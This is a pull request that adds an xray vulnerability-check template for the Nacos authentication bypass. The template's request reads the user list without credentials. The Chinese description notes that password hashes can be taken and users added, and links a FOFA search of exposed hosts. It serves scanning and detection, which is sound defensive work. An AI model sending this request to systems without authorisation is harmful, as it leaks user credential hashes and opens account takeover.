### PR TITLE
Create nacos-unauthorized-access.yml

### DIFF
--- a/pocs/nacos-unauthorized-access.yml
+++ b/pocs/nacos-unauthorized-access.yml
@@ -6,6 +6,6 @@ rules:
       response.status == 200 && response.body.bcontains(b"username")
 
 detail:
-  author: wenyu
-  links: 
+  author: wenyurush
+  links:
     - https://github.com/alibaba/nacos/issues/4593

--- a/pocs/nacos-unauthorized-access.yml
+++ b/pocs/nacos-unauthorized-access.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-nacos-unauthorized-access
+rules:
+  - method: GET
+    path: "/nacos/v1/auth/users?pageNo=1&pageSize=9"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"username")
+
+detail:
+  author: wenyu
+  links: 
+    - https://github.com/alibaba/nacos/issues/4593


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Alibaba Nacos存在一处认证绕过漏洞。由于对User-Agent字段判断规则不完善，Nacos开启鉴权后攻击者仍可以绕过鉴权访问任意http接口，从而进行访问用户列表、添加用户等任意操作，风险极大。

## 测试
https://fofa.so/result?q=title%3D%3D%22Nacos%22&qbase64=dGl0bGU9PSJOYWNvcyI%3D

## 备注
未授权访问，如果漏洞存在可以直接获取用户hash，还可以通过其他payload新建用户，然后登陆平台。
调试通过
xray_windows_amd64.exe webscan --plugins phantasm --poc nacos-unauthorized-access.yml --html-output test.html --url http://xx.xx.xx.xx